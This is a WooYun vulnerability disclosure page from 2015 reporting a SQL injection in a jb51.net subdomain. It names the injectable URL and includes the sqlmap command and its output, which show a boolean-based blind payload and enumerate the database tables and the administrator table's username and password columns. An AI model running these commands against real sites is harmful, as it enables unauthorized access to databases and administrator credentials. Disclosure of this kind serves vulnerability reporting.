当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
脚本之家某站存在SQL注入漏洞
相关厂商:
漏洞作者:
提交时间:
2015-07-21 12:24
修复时间:
2015-07-26 12:26
公开时间:
2015-07-26 12:26
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

脚本之家某站存在SQL注入的漏洞

详细说明:

脚本之家某站存在SQL注入的漏洞
地址:http://idc.jb51.net
注入地址:http://idc.jb51.net/style/info/newview.asp?id=317
使用sqlmap 跑

<python sqlmap.py -u "http://idc.jb51.net/style/info/newview.asp?id=317" --tables/code>
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=318 AND 2814=2814
---
[22:33:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[4 tables]
+---------------+
| administrator |
| article |
| feedback |
| links |
+---------------+
Database: Microsoft_Access_masterdb
Table: administrator
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| author | non-numeric |
| classid | numeric |
| id | numeric |
| keyword | non-numeric |
| username | non-numeric |
| userpwd | non-numeric |
+----------+-------------+


好了就这些咯

漏洞证明:

脚本之家某站存在SQL注入的漏洞
地址:http://idc.jb51.net
注入地址:http://idc.jb51.net/style/info/newview.asp?id=317
使用sqlmap 跑

<python sqlmap.py -u "http://idc.jb51.net/style/info/newview.asp?id=317" --tables/code>
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=318 AND 2814=2814
---
[22:33:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[4 tables]
+---------------+
| administrator |
| article |
| feedback |
| links |
+---------------+
Database: Microsoft_Access_masterdb
Table: administrator
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| author | non-numeric |
| classid | numeric |
| id | numeric |
| keyword | non-numeric |
| username | non-numeric |
| userpwd | non-numeric |
+----------+-------------+


好了就这些咯

修复方案:

过滤咯

版权声明:转载请注明来源 路人甲@乌云


>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-26 12:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无